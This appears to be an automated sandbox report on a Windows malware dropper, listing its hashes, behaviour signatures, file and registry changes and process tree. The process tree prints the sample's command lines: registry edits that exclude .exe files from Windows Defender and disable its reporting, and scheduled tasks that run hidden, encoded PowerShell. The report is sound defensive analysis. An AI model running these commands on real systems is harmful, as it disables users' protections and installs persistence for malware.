Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
128s -
max time network
137s -
platform
windows10-1703_x64 -
resource
win10-20231025-en -
resource tags
arch:x64arch:x86image:win10-20231025-enlocale:en-usos:windows10-1703-x64system -
submitted
18/11/2023, 09:00
Static task
static1
General
-
Target
32c56a96b26cae6333375e46e3c2576bf0e9b77551a40a5463ae9595ec5955ce.exe
-
Size
7.3MB
-
MD5
fa4a80406885b3608175cdef7800c6fe
-
SHA1
6d7f2f4ec288c084771fa1eaad9082ce330bffa6
-
SHA256
32c56a96b26cae6333375e46e3c2576bf0e9b77551a40a5463ae9595ec5955ce
-
SHA512
e76d387bbbd8f655184799d5d5c963c4396f32c821ebe5bcc829a003d0b5b7cfd1a4d0a6756380d6ec77c3a54add7470c3d7f17f7f2e57324896c148930e0be1
-
SSDEEP
196608:91OvQVe00IFwoYS5tBTdjMZ5zVRmUhWOqkjkIVXf:3OvF4YAXW5aUhWOqw
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 33 5000 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000\Control Panel\International\Geo\Nation BnpjJKD.exe -
Executes dropped EXE 4 IoCs
pid Process 4924 Install.exe 4116 Install.exe 3444 jRMeQmz.exe 3448 BnpjJKD.exe -
Loads dropped DLL 1 IoCs
pid Process 5000 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json BnpjJKD.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json BnpjJKD.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini BnpjJKD.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8C0A4A9E1CEFEB34D84E7975A8A5D28F BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 BnpjJKD.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini jRMeQmz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8C0A4A9E1CEFEB34D84E7975A8A5D28F BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_8FF5BE4204C5F704E3914BEF4952C317 BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol jRMeQmz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_5B1817C873771E7928FB0BB0A329932B BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 BnpjJKD.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 BnpjJKD.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_FB07F06F91B9FC3861EF6AA1C17C17C7 BnpjJKD.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol BnpjJKD.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi BnpjJKD.exe File created C:\Program Files (x86)\NVRHnqqYuoKU2\PLEyqAUqUZpFW.dll BnpjJKD.exe File created C:\Program Files (x86)\anbFGpaSVIJEC\kESPHIE.xml BnpjJKD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi BnpjJKD.exe File created C:\Program Files (x86)\NVRHnqqYuoKU2\OUFSnBc.xml BnpjJKD.exe File created C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\SsfwsfR.dll BnpjJKD.exe File created C:\Program Files (x86)\wbWGHgMzMEUn\zjSLljp.dll BnpjJKD.exe File created C:\Program Files (x86)\PxtQEfdrU\LyAqZF.dll BnpjJKD.exe File created C:\Program Files (x86)\PxtQEfdrU\IObgOib.xml BnpjJKD.exe File created C:\Program Files (x86)\GdxvlpYGnipdDYEVdBR\unkunZC.xml BnpjJKD.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak BnpjJKD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak BnpjJKD.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja BnpjJKD.exe File created C:\Program Files (x86)\anbFGpaSVIJEC\IWgYFVH.dll BnpjJKD.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bFvsKFifcttmubYYTU.job schtasks.exe File created C:\Windows\Tasks\uaXipkbyxrnNFDdtl.job schtasks.exe File created C:\Windows\Tasks\PhOAIbnrVHbfAsF.job schtasks.exe File created C:\Windows\Tasks\xOSrYfgHudgkQpnQd.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4476 schtasks.exe 4460 schtasks.exe 664 schtasks.exe 1216 schtasks.exe 4312 schtasks.exe 2128 schtasks.exe 3592 schtasks.exe 1344 schtasks.exe 4188 schtasks.exe 4556 schtasks.exe 3180 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" BnpjJKD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume BnpjJKD.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "7" BnpjJKD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix BnpjJKD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" BnpjJKD.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 BnpjJKD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ BnpjJKD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8555b6b6-0000-0000-0000-d01200000000} BnpjJKD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket BnpjJKD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" BnpjJKD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8555b6b6-0000-0000-0000-d01200000000}\NukeOnDelete = "0" BnpjJKD.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3704 powershell.EXE 3704 powershell.EXE 3704 powershell.EXE 1528 powershell.exe 1528 powershell.exe 1528 powershell.exe 3964 powershell.exe 3964 powershell.exe 3964 powershell.exe 712 powershell.EXE 712 powershell.EXE 712 powershell.EXE 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe 3448 BnpjJKD.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3704 powershell.EXE Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 712 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4196 wrote to memory of 4924 4196 32c56a96b26cae6333375e46e3c2576bf0e9b77551a40a5463ae9595ec5955ce.exe 70 PID 4196 wrote to memory of 4924 4196 32c56a96b26cae6333375e46e3c2576bf0e9b77551a40a5463ae9595ec5955ce.exe 70 PID 4196 wrote to memory of 4924 4196 32c56a96b26cae6333375e46e3c2576bf0e9b77551a40a5463ae9595ec5955ce.exe 70 PID 4924 wrote to memory of 4116 4924 Install.exe 71 PID 4924 wrote to memory of 4116 4924 Install.exe 71 PID 4924 wrote to memory of 4116 4924 Install.exe 71 PID 4116 wrote to memory of 2060 4116 Install.exe 73 PID 4116 wrote to memory of 2060 4116 Install.exe 73 PID 4116 wrote to memory of 2060 4116 Install.exe 73 PID 4116 wrote to memory of 4376 4116 Install.exe 75 PID 4116 wrote to memory of 4376 4116 Install.exe 75 PID 4116 wrote to memory of 4376 4116 Install.exe 75 PID 2060 wrote to memory of 3028 2060 forfiles.exe 77 PID 2060 wrote to memory of 3028 2060 forfiles.exe 77 PID 2060 wrote to memory of 3028 2060 forfiles.exe 77 PID 3028 wrote to memory of 1112 3028 cmd.exe 78 PID 3028 wrote to memory of 1112 3028 cmd.exe 78 PID 3028 wrote to memory of 1112 3028 cmd.exe 78 PID 4376 wrote to memory of 3612 4376 forfiles.exe 79 PID 4376 wrote to memory of 3612 4376 forfiles.exe 79 PID 4376 wrote to memory of 3612 4376 forfiles.exe 79 PID 3028 wrote to memory of 4168 3028 cmd.exe 81 PID 3028 wrote to memory of 4168 3028 cmd.exe 81 PID 3028 wrote to memory of 4168 3028 cmd.exe 81 PID 3612 wrote to memory of 880 3612 cmd.exe 80 PID 3612 wrote to memory of 880 3612 cmd.exe 80 PID 3612 wrote to memory of 880 3612 cmd.exe 80 PID 3612 wrote to memory of 1916 3612 cmd.exe 82 PID 3612 wrote to memory of 1916 3612 cmd.exe 82 PID 3612 wrote to memory of 1916 3612 cmd.exe 82 PID 4116 wrote to memory of 1216 4116 Install.exe 83 PID 4116 wrote to memory of 1216 4116 Install.exe 83 PID 4116 wrote to memory of 1216 4116 Install.exe 83 PID 4116 wrote to memory of 3852 4116 Install.exe 85 PID 4116 wrote to memory of 3852 4116 Install.exe 85 PID 4116 wrote to memory of 3852 4116 Install.exe 85 PID 3704 wrote to memory of 2092 3704 powershell.EXE 89 PID 3704 wrote to memory of 2092 3704 powershell.EXE 89 PID 4116 wrote to memory of 4824 4116 Install.exe 94 PID 4116 wrote to memory of 4824 4116 Install.exe 94 PID 4116 wrote to memory of 4824 4116 Install.exe 94 PID 4116 wrote to memory of 1344 4116 Install.exe 96 PID 4116 wrote to memory of 1344 4116 Install.exe 96 PID 4116 wrote to memory of 1344 4116 Install.exe 96 PID 3444 wrote to memory of 1528 3444 jRMeQmz.exe 99 PID 3444 wrote to memory of 1528 3444 jRMeQmz.exe 99 PID 3444 wrote to memory of 1528 3444 jRMeQmz.exe 99 PID 1528 wrote to memory of 528 1528 powershell.exe 101 PID 1528 wrote to memory of 528 1528 powershell.exe 101 PID 1528 wrote to memory of 528 1528 powershell.exe 101 PID 528 wrote to memory of 2816 528 cmd.exe 102 PID 528 wrote to memory of 2816 528 cmd.exe 102 PID 528 wrote to memory of 2816 528 cmd.exe 102 PID 1528 wrote to memory of 432 1528 powershell.exe 103 PID 1528 wrote to memory of 432 1528 powershell.exe 103 PID 1528 wrote to memory of 432 1528 powershell.exe 103 PID 1528 wrote to memory of 3448 1528 powershell.exe 104 PID 1528 wrote to memory of 3448 1528 powershell.exe 104 PID 1528 wrote to memory of 3448 1528 powershell.exe 104 PID 1528 wrote to memory of 3540 1528 powershell.exe 105 PID 1528 wrote to memory of 3540 1528 powershell.exe 105 PID 1528 wrote to memory of 3540 1528 powershell.exe 105 PID 1528 wrote to memory of 2960 1528 powershell.exe 106 PID 1528 wrote to memory of 2960 1528 powershell.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\32c56a96b26cae6333375e46e3c2576bf0e9b77551a40a5463ae9595ec5955ce.exe"C:\Users\Admin\AppData\Local\Temp\32c56a96b26cae6333375e46e3c2576bf0e9b77551a40a5463ae9595ec5955ce.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Users\Admin\AppData\Local\Temp\7zS8C90.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4924 -
C:\Users\Admin\AppData\Local\Temp\7zS922E.tmp\Install.exe.\Install.exe /ucididAe "385118" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1112
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4168
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3612 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:880
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1916
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEgepGGpI" /SC once /ST 07:04:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1216
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEgepGGpI"4⤵PID:3852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEgepGGpI"4⤵PID:4824
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bFvsKFifcttmubYYTU" /SC once /ST 09:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\YmqzWwwqxJQdhSTVN\PfzJEsvfSkvLAaT\jRMeQmz.exe\" 1c /LYsite_idkdO 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1344
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2092
-
-
